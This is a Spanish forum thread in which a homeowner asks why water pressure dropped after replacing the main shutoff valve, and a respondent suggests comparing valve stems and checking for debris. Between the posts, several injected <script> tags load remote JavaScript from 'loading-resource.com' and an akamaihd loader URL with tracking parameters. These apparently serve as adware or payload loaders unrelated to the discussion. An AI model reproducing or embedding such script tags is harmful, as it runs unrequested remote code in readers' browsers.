He cambiado la llave general del agua de mi casa y her perdido mucha presión

Hola a todos, quisiera que me ayudarais, ya que estoy hecho un lío. Hace unas semanas tuve que cambiar el grifo de la llave general de agua de mi casa, ya que después de venir de vacaciones y abrirla no dejaba de salir agua. Fui con llave viaja en mano a comprar una nueva, y bueno, me dijeron que sólo tenían un modelo, midieron el diámetro de la que llevaba y me dieron otra. Pues bien, nada más ponerla me doy cuenta de que he perdido en torno al 50% de la presión del agua que solía tener, lo cual es más notorio en el baño a la hora de usar el agua caliente. Me he asegurado que la llave general de mi piso (la que se encuentra en los contadores del portal) esté totalmente abierta, pero tengo ese problema. Me imagino que será debido a la nueva llave, pero no sé que hacer, Ayudadmeeeeeeeeeeeeeeeeee

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

1 Respuesta

Respuesta
1

¿Supongo qué lo que has cambiado es el vástago que va dentro de la llave? ¿El vástago de la llave vieja salio completo? Puede ser que se quedara algún resto de zapatilla o algo dentro de la cañería y este taponando, comprueba el vástago nuevo con el viejo que tenga el mismo largo a partir de la rosca, y aunque este abierto el vástago tapone demasiado la tubería.

Muchas gracias por tu respuesta, lo voy a mirar, lo malo es que ya tiré la llave vieja, aunque mira que para evitar problemas fui a la ferretería con gripo en mano. Saludos.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Vale ok, si no necesitas nada mas cierra la pregunta, pues se queda la entrada de mensajes bloqueada.

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas